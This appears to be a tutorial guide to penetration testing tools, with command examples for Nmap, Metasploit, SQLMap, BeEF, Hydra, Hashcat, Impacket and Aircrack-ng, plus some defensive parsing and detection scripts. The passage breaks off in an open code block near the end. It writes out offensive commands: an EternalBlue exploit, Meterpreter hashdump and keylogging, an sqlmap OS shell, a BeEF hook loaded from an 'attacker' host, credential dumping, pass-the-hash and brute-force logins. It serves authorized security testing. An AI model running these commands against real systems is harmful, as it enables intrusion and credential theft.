Every penetration tester needs a comprehensive toolkit to effectively assess security posture. This guide covers essential penetration testing tools across all phases of security assessments, from reconnaissance to post-exploitation, with practical usage examples and best practices.
Building Your Penetration Testing Toolkit
Professional penetration testers rely on specialized tools for different testing phases. Understanding when and how to use each tool is as important as knowing they exist.
Tool Categories
- Information Gathering: Reconnaissance and OSINT
- Vulnerability Analysis: Scanning and assessment
- Exploitation: Gaining access
- Post-Exploitation: Maintaining access and pivoting
- Web Applications: Specialized web testing
- Password Attacks: Credential testing
- Wireless: Wi-Fi security assessment
- Network Analysis: Traffic inspection
- Reporting: Documentation and presentation
Essential Penetration Testing Distributions
Kali Linux
The industry-standard penetration testing distribution.
```bash
# Download Kali Linux from kali.org/downloads
# Install on bare metal, in a VM (VMware/VirtualBox), under WSL2, or in Docker

# Update Kali
sudo apt update && sudo apt upgrade -y
sudo apt dist-upgrade -y

# Install additional tools
sudo apt install -y <tool_name>

# Metapackages for specific areas
sudo apt install -y kali-tools-web           # Web application testing
sudo apt install -y kali-tools-wireless      # Wireless testing
sudo apt install -y kali-tools-passwords     # Password cracking
sudo apt install -y kali-tools-exploitation  # Exploitation tools
```
Advantages:
- Pre-installed security tools (600+)
- Regular updates and tool maintenance
- Optimized for penetration testing
- Excellent documentation and community support
- Multiple desktop environments available
Parrot Security OS
Alternative penetration testing distribution with privacy focus.
Features:
- Privacy-focused configuration
- Lightweight compared to Kali
- Anonymity and cryptography tools included
- Developer-friendly environment
- Cloud and forensics tools

Download: parrotsec.org
BlackArch Linux
Arch-based penetration testing distribution.
Features:
- Massive tool collection (2800+ tools)
- Modular installation
- Rolling release model
- Best suited to advanced users

```bash
# Install tools individually
sudo pacman -S <tool_name>
```
Information Gathering Tools
1. Nmap - Network Scanner
The most essential network discovery and port scanning tool.
```bash
# Installation
sudo apt install nmap   # Debian/Ubuntu
sudo yum install nmap   # CentOS/RHEL

# Basic scans
nmap 192.168.1.1                 # Simple scan
nmap 192.168.1.0/24              # Subnet scan
nmap -p 80,443 192.168.1.1       # Specific ports

# Advanced scans (raw-packet scans such as -sS, -sU and the OS detection in -A need root)
nmap -sV 192.168.1.1             # Service version detection
nmap -sC 192.168.1.1             # Default scripts
sudo nmap -A 192.168.1.1         # Aggressive (OS, version, scripts, traceroute)
nmap -p- 192.168.1.1             # All 65535 TCP ports
sudo nmap -sU 192.168.1.1        # UDP scan
sudo nmap -sS 192.168.1.1        # SYN (half-open) scan

# NSE scripts
nmap --script vuln 192.168.1.1              # Vulnerability scripts
nmap --script smb-enum-shares 192.168.1.1   # SMB enumeration
nmap --script http-enum 192.168.1.1         # HTTP enumeration

# Output formats
nmap -oN output.txt 192.168.1.1    # Normal output
nmap -oX output.xml 192.168.1.1    # XML output (best for parsing and tool import)
nmap -oG output.gnmap 192.168.1.1  # Greppable output
nmap -oA output 192.168.1.1        # All three formats at once

# Timing and performance
nmap -T4 192.168.1.1               # Aggressive timing
nmap -T2 192.168.1.1               # Polite timing (slower)
nmap --min-rate 1000 192.168.1.1   # Minimum packet rate
```
Use Cases:
- Network discovery and mapping
- Port and service identification
- OS fingerprinting
- Vulnerability detection via NSE
- Firewall and IDS evasion testing
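The XML output format above is the one to use when Nmap results feed into other tooling. As an added example (not code from the original guide or from the Nmap project), the following script parses an `-oX` file into a service inventory and flags any open port that is not on an expected-services baseline, which is how a scan becomes a finding rather than a raw port list. The XML document and the `EXPECTED` allow-list are constructed sample data following the real Nmap XML schema.

```python
"""Parse Nmap -oX output into an inventory and flag open ports outside a baseline.

Added example, not part of the original guide. SAMPLE_XML and EXPECTED are
constructed illustrations; point parse_nmap_xml() at a real output.xml instead.
"""
import xml.etree.ElementTree as ET
from dataclasses import dataclass

# Constructed sample in the Nmap XML schema: two hosts up, one down, one closed port.
SAMPLE_XML = """<?xml version="1.0" encoding="UTF-8"?>
<nmaprun scanner="nmap" args="nmap -sV -oX output.xml 192.168.1.0/24">
  <host><status state="up"/><address addr="192.168.1.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH" version="8.9p1"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http" product="nginx" version="1.18.0"/></port>
      <port protocol="tcp" portid="3306"><state state="open"/><service name="mysql" product="MySQL"/></port>
      <port protocol="tcp" portid="443"><state state="closed"/><service name="https"/></port>
    </ports>
  </host>
  <host><status state="up"/><address addr="192.168.1.20" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="3389"><state state="open"/><service name="ms-wbt-server"/></port>
    </ports>
  </host>
  <host><status state="down"/><address addr="192.168.1.30" addrtype="ipv4"/></host>
</nmaprun>
"""

# Assumed baseline: the ports each host is supposed to expose.
EXPECTED = {
    "192.168.1.10": {22, 80, 443},
    "192.168.1.20": set(),
}


@dataclass(frozen=True)
class Service:
    host: str
    proto: str
    port: int
    name: str
    product: str
    version: str


def parse_nmap_xml(xml_text: str) -> list[Service]:
    """Return one Service per open port on every host that is up."""
    root = ET.fromstring(xml_text)
    services = []
    for host in root.iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            continue
        addr = addr_el.get("addr")
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            attr = (lambda k: svc.get(k, "")) if svc is not None else (lambda k: "")
            services.append(Service(
                host=addr, proto=port.get("protocol"), port=int(port.get("portid")),
                name=attr("name"), product=attr("product"), version=attr("version"),
            ))
    return services


def unexpected_services(services: list[Service], expected: dict) -> list[Service]:
    """Open ports that the baseline does not list for that host."""
    return [s for s in services if s.port not in expected.get(s.host, set())]


def inventory_report(xml_text: str, expected: dict) -> str:
    """One line per open service, marking anything outside the baseline."""
    lines = []
    for s in parse_nmap_xml(xml_text):
        flag = "" if s.port in expected.get(s.host, set()) else "  <-- not in baseline"
        lines.append(f"{s.host}:{s.port}/{s.proto} {s.name} {s.product} {s.version}".rstrip() + flag)
    return "\n".join(lines)


if __name__ == "__main__":
    print(inventory_report(SAMPLE_XML, EXPECTED))
```

Run against a real scan with `inventory_report(open("output.xml").read(), EXPECTED)`; the same parser works on `-oA` output because `-oA` writes the `.xml` file alongside the other two.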
2. Masscan - High-Speed Port Scanner
The fastest port scanner available, capable of scanning the entire IPv4 Internet in under 6 minutes.
```bash
# Installation
sudo apt install masscan

# Basic usage
sudo masscan -p80,443 192.168.1.0/24 --rate=10000

# Scan all ports
sudo masscan -p1-65535 192.168.1.1 --rate=100000

# Output to file
sudo masscan -p80,443 192.168.1.0/24 --rate=10000 -oL output.txt

# Specific techniques
sudo masscan -p80,443 192.168.1.0/24 --banners        # Grab banners
sudo masscan --excludefile exclude.txt 10.0.0.0/8      # Exclude IPs
```
Use Cases:
- Large network reconnaissance
- Internet-wide scanning
- Quick port discovery before detailed Nmap scans
- Bug bounty reconnaissance
3. Recon-ng - Reconnaissance Framework
Modular framework for open-source intelligence gathering.
```text
# Installation
sudo apt install recon-ng

# Start Recon-ng
recon-ng

# Workspace management
[recon-ng][default] > workspaces create example_com
[recon-ng][example_com] > db insert domains example.com

# Module discovery
[recon-ng][example_com] > marketplace search
[recon-ng][example_com] > marketplace search domains-hosts

# Install and use modules
[recon-ng][example_com] > marketplace install recon/domains-hosts/google_site_web
[recon-ng][example_com] > modules load recon/domains-hosts/google_site_web
[recon-ng][example_com][google_site_web] > run

# Export results
[recon-ng][example_com] > modules load reporting/html
[recon-ng][example_com][html] > run
```
Use Cases:
- Automated OSINT gathering
- Domain and subdomain enumeration
- Contact information discovery
- Social media profiling
- Data correlation and reporting
4. theHarvester - Email and Subdomain Harvester
Gather emails, subdomains, and employee names from public sources.
```bash
# Installation
sudo apt install theharvester

# Basic usage
theHarvester -d example.com -b google
theHarvester -d example.com -b all

# Specific sources
theHarvester -d example.com -b linkedin
theHarvester -d example.com -b bing,yahoo,google

# Limit results
theHarvester -d example.com -b google -l 100

# DNS brute force (-c); -n performs DNS lookups on discovered hosts instead
theHarvester -d example.com -b google -c

# Save results
theHarvester -d example.com -b all -f output.html
```
Use Cases:
- Email address enumeration
- Subdomain discovery
- Employee identification
- Attack surface mapping
5. Sublist3r - Subdomain Enumeration
Fast subdomain enumeration using search engines.
```bash
# Installation
git clone https://github.com/aboul3la/Sublist3r.git
cd Sublist3r
pip3 install -r requirements.txt

# Basic usage
python3 sublist3r.py -d example.com

# Brute force
python3 sublist3r.py -d example.com -b

# Output to file
python3 sublist3r.py -d example.com -o output.txt

# Specific search engines
python3 sublist3r.py -d example.com -e google,bing,yahoo
```
Use Cases:
- Subdomain discovery
- Attack surface enumeration
- Finding forgotten or hidden services
Vulnerability Analysis Tools
6. Nessus - Vulnerability Scanner
Industry-leading commercial vulnerability scanner (free Essentials version available).
```bash
# Installation: download from tenable.com/downloads/nessus
sudo dpkg -i Nessus-*.deb    # Debian/Ubuntu
sudo rpm -ivh Nessus-*.rpm   # CentOS/RHEL

# Start service
sudo systemctl start nessusd
sudo systemctl enable nessusd

# Access web interface
# https://localhost:8834
```

Features:
- Comprehensive vulnerability database
- Compliance scanning
- Web application scanning
- Network scanning
- Configuration auditing
Use Cases:
- Comprehensive vulnerability assessment
- Compliance auditing (PCI DSS, HIPAA)
- Configuration review
- Patch management assessment
7. OpenVAS - Open Vulnerability Assessment System
Open-source alternative to Nessus.
```bash
# Installation (via Docker)
docker run -d -p 443:443 --name openvas mikesplain/openvas
# Web interface for the Docker image: https://localhost:443

# Installation (native, Kali)
sudo apt install openvas
sudo gvm-setup
sudo gvm-start
# gvm-start prints the web interface address; on Kali it defaults to https://127.0.0.1:9392

# Command line usage
gvm-cli socket --xml "<get_tasks/>"
```
Use Cases:
- Free vulnerability scanning
- Network security assessment
- Compliance checking
- Continuous monitoring
8. Nikto - Web Server Scanner
Open-source web server vulnerability scanner.
```bash
# Installation
sudo apt install nikto

# Basic scan
nikto -h https://example.com

# Comprehensive scan (all tuning categories)
nikto -h https://example.com -Tuning 123456789

# Specific tests
nikto -h https://example.com -Tuning 1   # Interesting files
nikto -h https://example.com -Tuning 2   # Misconfiguration
nikto -h https://example.com -Tuning 3   # Information disclosure

# Output to file
nikto -h https://example.com -o output.html -Format html

# Through proxy
nikto -h https://example.com -useproxy http://127.0.0.1:8080

# Update database
nikto -update
```
Use Cases:
- Web server vulnerability scanning
- Outdated software detection
- Configuration issues
- Dangerous files/CGI detection
9. Nuclei - Fast Vulnerability Scanner
Template-based vulnerability scanner with extensive template library.
```bash
# Installation (v2 module path as published with this guide; current releases
# live at github.com/projectdiscovery/nuclei/v3/cmd/nuclei)
go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest

# Basic usage
nuclei -u https://example.com

# Multiple targets
nuclei -l targets.txt

# Specific severity
nuclei -u https://example.com -severity critical,high

# Specific templates
nuclei -u https://example.com -t nuclei-templates/cves/
nuclei -u https://example.com -t nuclei-templates/vulnerabilities/

# Custom templates
nuclei -u https://example.com -t custom-template.yaml

# Update templates
nuclei -update-templates
```
Use Cases:
- Fast vulnerability detection
- CVE verification
- Misconfiguration discovery
- Custom vulnerability checks
Exploitation Tools
10. Metasploit Framework - Exploitation Framework
Most comprehensive penetration testing framework.
```text
# Installation (included in Kali)
sudo apt install metasploit-framework

# Initialize database
sudo msfdb init

# Start Metasploit
msfconsole

# Search exploits
msf6 > search <keyword>
msf6 > search type:exploit platform:windows
msf6 > search cve:2021

# Use exploit
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > show options
msf6 > set RHOSTS 192.168.1.10
msf6 > set LHOST 192.168.1.5
msf6 > exploit

# Auxiliary modules
msf6 > use auxiliary/scanner/portscan/tcp
msf6 > use auxiliary/scanner/http/dir_scanner

# Meterpreter commands (post-exploitation)
meterpreter > sysinfo
meterpreter > getuid
meterpreter > hashdump
meterpreter > screenshot
meterpreter > keyscan_start
meterpreter > shell
```
Use Cases:
- Exploit development and testing
- Vulnerability exploitation
- Post-exploitation activities
- Payload generation
- Privilege escalation
11. SQLMap - SQL Injection Tool
Automated SQL injection detection and exploitation.
```bash
# Installation
sudo apt install sqlmap

# Basic usage
sqlmap -u "http://example.com/page?id=1"

# POST request
sqlmap -u "http://example.com/login" --data="username=admin&password=test"

# Enumerate databases
sqlmap -u "http://example.com/page?id=1" --dbs

# Enumerate tables
sqlmap -u "http://example.com/page?id=1" -D database_name --tables

# Dump data
sqlmap -u "http://example.com/page?id=1" -D database -T users --dump

# OS shell
sqlmap -u "http://example.com/page?id=1" --os-shell

# Advanced options
sqlmap -u "http://example.com/page?id=1" --batch --random-agent --level=5 --risk=3

# Through proxy
sqlmap -u "http://example.com/page?id=1" --proxy=http://127.0.0.1:8080
```
Use Cases:
- SQL injection detection
- Database enumeration
- Data extraction
- File system access
- OS command execution
12. BeEF - Browser Exploitation Framework
Web browser exploitation framework.
```bash
# Installation
sudo apt install beef-xss

# Start BeEF
beef-xss

# Access web interface
# http://127.0.0.1:3000/ui/panel
# Default credentials: beef:beef
```

The hook script that a page includes to register a browser with BeEF:

```html
<script src="http://attacker:3000/hook.js"></script>
```

Features:
- Browser fingerprinting
- Network discovery
- Social engineering
- Exploit delivery
- Persistence mechanisms
Use Cases:
- Client-side exploitation
- Browser-based attacks
- Social engineering campaigns
- XSS impact demonstration
Web Application Testing Tools
13. Burp Suite - Web Application Security Testing
Industry-standard web application testing platform.
Installation: download from portswigger.net. The Professional version is commercial; the Community edition is free.

```bash
# Start Burp Suite
burpsuite
```

Key features:
- Proxy interceptor
- Scanner (Pro only)
- Intruder (attack automation)
- Repeater (request manipulation)
- Decoder/encoder
- Comparer

Proxy configuration: configure the browser to use 127.0.0.1:8080 as its HTTP proxy.

Intruder usage:
1. Send a request to Intruder
2. Mark injection points with §payload§
3. Select the attack type (sniper, battering ram, etc.)
4. Load payloads
5. Start the attack

Extensions:
- Logger++
- Autorize
- Active Scan++
- JSON Web Tokens
Use Cases:
- Manual web application testing
- Request/response manipulation
- Automated scanning (Pro)
- Authentication testing
- Session management analysis
14. OWASP ZAP - Web Application Scanner
Free alternative to Burp Suite.
```bash
# Installation
sudo apt install zaproxy

# Start ZAP
zaproxy

# Command line (zap-cli is a separate Python wrapper around the ZAP API: pip3 install zapcli)
zap-cli start
zap-cli open-url https://example.com
zap-cli spider https://example.com
zap-cli active-scan https://example.com
zap-cli alerts

# API mode
zap.sh -daemon -port 8080 -config api.key=<key>

# Docker
docker run -u zap -p 8080:8080 owasp/zap2docker-stable zap.sh -daemon -host 0.0.0.0 -port 8080
```
Use Cases:
- Automated web app scanning
- API testing
- CI/CD integration
- Manual testing via proxy
- AJAX spidering
15. Gobuster - Directory Brute-Forcer
Fast directory and file brute-forcing tool.
```bash
# Installation
sudo apt install gobuster

# Directory brute-forcing
gobuster dir -u https://example.com -w /usr/share/wordlists/dirb/common.txt

# DNS subdomain brute-forcing
gobuster dns -d example.com -w /usr/share/wordlists/subdomains.txt

# Virtual host discovery
gobuster vhost -u https://example.com -w /usr/share/wordlists/vhosts.txt

# Advanced options: file extensions and 50 threads
gobuster dir -u https://example.com -w wordlist.txt -x php,html,txt -t 50

# With HTTP basic authentication
gobuster dir -u https://example.com -w wordlist.txt -U username -P password

# Status codes (gobuster 3.x blacklists 404 by default; clear that blacklist with -b "" when using -s)
gobuster dir -u https://example.com -w wordlist.txt -s 200,204,301,302,307 -b ""
```
Use Cases:
- Hidden directory discovery
- File enumeration
- Subdomain brute-forcing
- Virtual host discovery
Password Attack Tools
16. John the Ripper - Password Cracker
Powerful password cracking tool.
```bash
# Installation
sudo apt install john

# Crack Linux passwords (reading /etc/shadow requires root)
sudo unshadow /etc/passwd /etc/shadow > hashes.txt
john hashes.txt

# Crack with wordlist
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

# Show cracked passwords
john --show hashes.txt

# Specific formats
john --format=Raw-MD5 hashes.txt
john --format=NT hashes.txt

# Rules (default ruleset)
john --wordlist=wordlist.txt --rules hashes.txt

# Named ruleset
john --wordlist=wordlist.txt --rules=jumbo hashes.txt

# Incremental mode
john --incremental hashes.txt
```
Use Cases:
- Password hash cracking
- Weak password identification
- Password policy assessment
- Credential recovery
17. Hashcat - Advanced Password Cracker
GPU-accelerated password cracking tool.
```bash
# Installation
sudo apt install hashcat

# Basic usage
hashcat -m 0 -a 0 hashes.txt wordlist.txt   # MD5, straight wordlist attack

# Common hash types
# -m 0:     MD5
# -m 1000:  NTLM
# -m 1800:  sha512crypt
# -m 3200:  bcrypt
# -m 13100: Kerberos TGS

# Attack modes
# -a 0: Straight (wordlist)
# -a 1: Combination
# -a 3: Brute-force (mask)
# -a 6: Hybrid wordlist + mask
# -a 7: Hybrid mask + wordlist

# Brute-force mask attack (eight characters from the full printable set)
hashcat -m 0 -a 3 hashes.txt ?a?a?a?a?a?a?a?a

# Rules-based attack
hashcat -m 0 -a 0 hashes.txt wordlist.txt -r rules/best64.rule

# Show cracked
hashcat -m 0 hashes.txt --show

# Benchmark
hashcat -b
```
Use Cases:
- Fast GPU-based cracking
- Complex password attacks
- Hash type identification
- Performance benchmarking
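The mask attack and the benchmark above go together: the size of a mask's keyspace divided by the benchmarked rate for a hash type is what makes a password policy defensible or not. As an added example (not code from the original guide or from the hashcat project), the following script expands a hashcat mask into its keyspace and estimates the time to exhaust it for several hash types. The per-hash rates are assumed illustrative orders of magnitude, not measurements; substitute your own `hashcat -b` figures.

```python
"""Keyspace and exhaustion-time estimates for hashcat masks.

Added example, not part of the original guide. RATES holds assumed illustrative
hashes-per-second figures; replace them with your own benchmark output.
"""

# Charset sizes of the built-in hashcat mask tokens.
CHARSET_SIZES = {"?l": 26, "?u": 26, "?d": 10, "?s": 33, "?a": 95, "?b": 256}

# Assumed order-of-magnitude rates for one GPU (constructed, not benchmarks).
RATES = {
    "MD5 (-m 0)": 1e10,
    "NTLM (-m 1000)": 1e10,
    "sha512crypt (-m 1800)": 1e5,
    "bcrypt (-m 3200)": 2e4,
}


def mask_keyspace(mask: str) -> int:
    """Number of candidates a mask expands to.

    Literal characters contribute a factor of 1, and '??' is hashcat's escape
    for a literal question mark.
    """
    keyspace = 1
    i = 0
    while i < len(mask):
        if mask[i] == "?":
            token = mask[i:i + 2]
            if token == "??":
                pass  # literal '?'
            elif token in CHARSET_SIZES:
                keyspace *= CHARSET_SIZES[token]
            else:
                raise ValueError(f"unknown mask token {token!r}")
            i += 2
        else:
            i += 1  # literal character
    return keyspace


def exhaustion_seconds(mask: str, rate_per_second: float) -> float:
    """Worst-case seconds to try every candidate; a hit lands at half of this on average."""
    return mask_keyspace(mask) / rate_per_second


def human_duration(seconds: float) -> str:
    """Coarse human-readable duration, good enough for policy discussions."""
    for unit, size in (("years", 365 * 86400), ("days", 86400), ("hours", 3600), ("minutes", 60)):
        if seconds >= size:
            return f"{seconds / size:.1f} {unit}"
    return f"{seconds:.1f} seconds"


def estimate_all(mask: str, rates: dict = RATES) -> dict:
    """Exhaustion time per hash type for one mask."""
    return {name: exhaustion_seconds(mask, rate) for name, rate in rates.items()}


if __name__ == "__main__":
    for mask in ("?a?a?a?a?a?a?a?a", "?u?l?l?l?l?l?d?d?d?d", "Summer?d?d?d?d"):
        print(f"{mask}: {mask_keyspace(mask):,} candidates")
        for name, secs in estimate_all(mask).items():
            print(f"  {name:<22} {human_duration(secs)}")
```

The second mask in the usage loop is the classic "capital, lowercase, digits" pattern that password-complexity rules tend to produce; compare its keyspace with the full `?a` mask of the same length to see why a predictable structure costs more than a missing character class.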
18. Hydra - Network Login Cracker
Parallel network login cracker.
```bash
# Installation
sudo apt install hydra

# SSH brute-force
hydra -l admin -P passwords.txt ssh://192.168.1.1

# HTTP POST form
hydra -l admin -P passwords.txt 192.168.1.1 http-post-form "/login:username=^USER^&password=^PASS^:Invalid"

# FTP brute-force
hydra -L users.txt -P passwords.txt ftp://192.168.1.1

# RDP brute-force
hydra -l administrator -P passwords.txt rdp://192.168.1.1

# Multiple protocols
hydra -L users.txt -P passwords.txt 192.168.1.1 ssh
hydra -L users.txt -P passwords.txt 192.168.1.1 ftp
hydra -L users.txt -P passwords.txt 192.168.1.1 telnet

# Threading
hydra -l admin -P passwords.txt -t 4 ssh://192.168.1.1
```
Use Cases:
- Network service credential testing
- Password policy validation
- Weak credential identification
- Multi-protocol attacks
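Every Hydra run above leaves a recognisable trace on the target, and a credential-testing engagement should confirm that the client's monitoring sees it. As an added example (not code from the original guide or from the Hydra project), the following detector reads OpenSSH `auth.log` lines and raises an alert when one source address produces a burst of failed password attempts inside a sliding window. The log lines are constructed samples in the standard syslog/sshd format; the threshold and window are assumed tuning values.

```python
"""Detect SSH password-guessing bursts in auth.log lines.

Added example, not part of the original guide. SAMPLE_LOG is constructed;
threshold and window are assumed tuning values, not recommendations.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: one noisy source, one legitimate key login, one slow source.
SAMPLE_LOG = """\
Mar  3 10:00:01 host sshd[2101]: Failed password for invalid user admin from 203.0.113.7 port 51022 ssh2
Mar  3 10:00:02 host sshd[2103]: Failed password for invalid user admin from 203.0.113.7 port 51024 ssh2
Mar  3 10:00:02 host sshd[2105]: Failed password for root from 203.0.113.7 port 51026 ssh2
Mar  3 10:00:03 host sshd[2107]: Failed password for root from 203.0.113.7 port 51028 ssh2
Mar  3 10:00:03 host sshd[2109]: Failed password for invalid user test from 203.0.113.7 port 51030 ssh2
Mar  3 10:00:04 host sshd[2111]: Accepted publickey for alice from 198.51.100.5 port 40110 ssh2: ED25519 SHA256:constructedfingerprint
Mar  3 10:00:09 host sshd[2113]: Failed password for bob from 198.51.100.9 port 40200 ssh2
Mar  3 10:05:00 host sshd[2120]: Failed password for bob from 198.51.100.9 port 40202 ssh2
"""

# Syslog timestamp, host, sshd pid, then the OpenSSH failure message.
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_failures(log_text: str, year: int = 2024) -> list[tuple]:
    """Return (timestamp, source_ip, username) for every failed password line.

    Syslog timestamps carry no year, so one is assumed for parsing.
    """
    events = []
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if not m:
            continue
        stamp = " ".join(m["ts"].split())  # collapse the day-padding double space
        ts = datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["ip"], m["user"]))
    return events


def detect_bursts(events, threshold: int = 5, window: timedelta = timedelta(seconds=60)) -> dict:
    """Per source IP, the largest run of failures that fits inside `window`.

    Returns {ip: {"count", "users", "first", "last"}} for sources reaching threshold.
    """
    by_ip = defaultdict(list)
    for ts, ip, user in sorted(events):
        by_ip[ip].append((ts, user))

    alerts = {}
    for ip, attempts in by_ip.items():
        start = 0
        for end in range(len(attempts)):
            # Slide the window start forward until it spans at most `window`.
            while attempts[end][0] - attempts[start][0] > window:
                start += 1
            count = end - start + 1
            if count >= threshold and count > alerts.get(ip, {}).get("count", 0):
                alerts[ip] = {
                    "count": count,
                    "users": sorted({u for _, u in attempts[start:end + 1]}),
                    "first": attempts[start][0],
                    "last": attempts[end][0],
                }
    return alerts


def alert_lines(log_text: str, **kwargs) -> list[str]:
    """Human-readable alert per offending source."""
    return [
        f"{ip}: {a['count']} failed logins between {a['first']:%H:%M:%S} and "
        f"{a['last']:%H:%M:%S}, users tried: {', '.join(a['users'])}"
        for ip, a in detect_bursts(parse_failures(log_text), **kwargs).items()
    ]


if __name__ == "__main__":
    for line in alert_lines(SAMPLE_LOG):
        print(line)
```

The sliding window, rather than a plain per-IP count, is what separates a low-and-slow guesser (two attempts five minutes apart, no alert) from a tool run (five attempts in three seconds, alert), and the list of usernames tried is the first thing an analyst wants when triaging the alert.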
Network Analysis Tools
19. Wireshark - Network Protocol Analyzer
Premier network packet analyzer.
```bash
# Installation
sudo apt install wireshark

# Start Wireshark (capturing needs root or membership in the wireshark group)
wireshark
```

Capture filters (BPF syntax, applied while capturing):

```text
host 192.168.1.1
port 80
tcp
udp
icmp
```

Display filters (applied to captured packets):

```text
http
http.request.method == "POST"
tcp.port == 80
ip.src == 192.168.1.1
http.cookie contains "session"
tcp.stream eq 1
```

```bash
# Command line (tshark): -f takes a capture filter, -Y a display filter
tshark -i eth0
tshark -i eth0 -f "port 80"
tshark -i eth0 -Y "http.request.method == POST"
tshark -r capture.pcap -Y http
```
Use Cases:
- Network traffic analysis
- Protocol debugging
- Credential sniffing
- Malware analysis
- Network troubleshooting
20. tcpdump - Packet Capture Tool
Command-line packet analyzer.
```bash
# Installation
sudo apt install tcpdump

# Basic capture
sudo tcpdump -i eth0

# Specific host
sudo tcpdump -i eth0 host 192.168.1.1

# Specific port
sudo tcpdump -i eth0 port 80

# Save to file
sudo tcpdump -i eth0 -w capture.pcap

# Read from file
tcpdump -r capture.pcap

# Verbose output (each extra v adds detail)
sudo tcpdump -i eth0 -v
sudo tcpdump -i eth0 -vv
sudo tcpdump -i eth0 -vvv

# Display ASCII
sudo tcpdump -i eth0 -A

# Hexadecimal and ASCII, including the link-layer header
sudo tcpdump -i eth0 -XX
```
Use Cases:
- Quick packet capture
- Remote packet analysis
- Scripting and automation
- Lightweight monitoring
Specialized Tools
21. Aircrack-ng - Wireless Security Suite
Comprehensive Wi-Fi security testing toolkit.
```bash
# Installation
sudo apt install aircrack-ng

# Put card in monitor mode
sudo airmon-ng start wlan0

# Scan for networks
sudo airodump-ng wlan0mon

# Capture handshake
sudo airodump-ng -c <channel> --bssid <BSSID> -w capture wlan0mon

# Deauth attack (force handshake)
sudo aireplay-ng -0 10 -a <BSSID> -c <CLIENT> wlan0mon

# Crack WPA/WPA2
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap

# WEP cracking: capture IVs
sudo airodump-ng -c <channel> --bssid <BSSID> -w wep wlan0mon

# ARP replay attack
sudo aireplay-ng -3 -b <BSSID> -h <CLIENT> wlan0mon

# Crack
aircrack-ng wep-01.cap
```
Use Cases:
- Wireless penetration testing
- WPA/WPA2 security assessment
- Rogue AP detection
- Wi-Fi monitoring
22. Impacket - Network Protocol Implementation
Python-based network protocol toolkit.
```bash
# Installation
pip3 install impacket

# SMB enumeration
smbclient.py domain/user:password@target
smbmap -u user -p password -H target   # smbmap is a separate tool, not part of Impacket

# Pass-the-Hash
psexec.py administrator@target -hashes :ntlm_hash

# Kerberoasting
GetUserSPNs.py domain/user:password -dc-ip dc_ip -request

# Secret extraction
secretsdump.py domain/user:password@target

# NTLM relay
ntlmrelayx.py -t target -smb2support

# WMI execution
wmiexec.py domain/user:password@target
```
Use Cases:
- Windows network testing
- Active Directory assessment
- Credential dumping
- Lateral movement
- Protocol manipulation
Reporting and Documentation Tools
23. Dradis - Collaboration and Reporting
Open-source reporting and collaboration platform.
```bash
# Installation
git clone https://github.com/dradis/dradis-ce.git
cd dradis-ce
./bin/setup                # installs gems and initializes the database
bundle exec rails server
```

Features:
- Centralized note-taking
- Team collaboration
- Import tool outputs
- Generate reports
- Template customization
Use Cases:
- Team collaboration
- Centralized documentation
- Report generation
- Evidence management
24. CherryTree - Hierarchical Note-Taking
Powerful note-taking application for pentesters.
```bash
# Installation
sudo apt install cherrytree
```

Features:
- Hierarchical structure
- Code syntax highlighting
- Rich text formatting
- Screenshot embedding
- Search functionality
- Export to various formats
Use Cases:
- Engagement notes
- Command documentation
- Screenshot management
- Knowledge base
Tool Management and Automation
Creating Custom Toolkit Script
```bash
#!/bin/bash
# penetration-testing-toolkit.sh
# Installs a baseline toolkit on a Debian-based system (package names as in Kali).
set -euo pipefail

# Update system
update_system() {
    echo "[+] Updating system..."
    sudo apt update && sudo apt upgrade -y
}

# Install reconnaissance tools
install_recon_tools() {
    echo "[+] Installing reconnaissance tools..."
    sudo apt install -y nmap masscan \
        recon-ng theharvester \
        sublist3r dnsenum dnsrecon \
        whois curl wget
}

# Install vulnerability analysis tools
install_vuln_tools() {
    echo "[+] Installing vulnerability analysis tools..."
    sudo apt install -y nikto nuclei \
        openvas wapiti
}

# Install exploitation tools
install_exploit_tools() {
    echo "[+] Installing exploitation tools..."
    sudo apt install -y metasploit-framework \
        sqlmap beef-xss \
        exploitdb
}

# Install web application tools
install_web_tools() {
    echo "[+] Installing web application tools..."
    sudo apt install -y burpsuite zaproxy \
        gobuster dirb dirbuster \
        wfuzz ffuf feroxbuster
}

# Install password attack tools
install_password_tools() {
    echo "[+] Installing password attack tools..."
    sudo apt install -y john hashcat \
        hydra medusa patator \
        crunch wordlists
}

# Install network tools
install_network_tools() {
    echo "[+] Installing network analysis tools..."
    sudo apt install -y wireshark tshark \
        tcpdump netcat socat \
        proxychains tor
}

# Install post-exploitation tools
install_postexploit_tools() {
    echo "[+] Installing post-exploitation tools..."
    sudo apt install -y mimikatz \
        bloodhound neo4j \
        powershell powershell-empire   # Kali packages Empire as powershell-empire
    # Install Impacket (on Kali, apt's python3-impacket and impacket-scripts also work)
    pip3 install impacket
}

# Main installation
main() {
    update_system
    install_recon_tools
    install_vuln_tools
    install_exploit_tools
    install_web_tools
    install_password_tools
    install_network_tools
    install_postexploit_tools
    echo "[+] Toolkit installation complete!"
}

main "$@"
```
Best Practices for Tool Usage
1. Always Get Authorization
⚠️ CRITICAL: Never use penetration testing tools without explicit written
authorization. Unauthorized use violates computer fraud laws and can result
in criminal prosecution.
2. Understand Tools Before Using
- Read documentation thoroughly
- Practice in lab environments
- Understand tool limitations
- Know potential false positives
3. Validate Tool Results
- Manual verification of findings
- Cross-reference multiple tools
- Confirm vulnerabilities before reporting
- Avoid automated-only assessments
4. Keep Tools Updated
```bash
# Update Kali tools
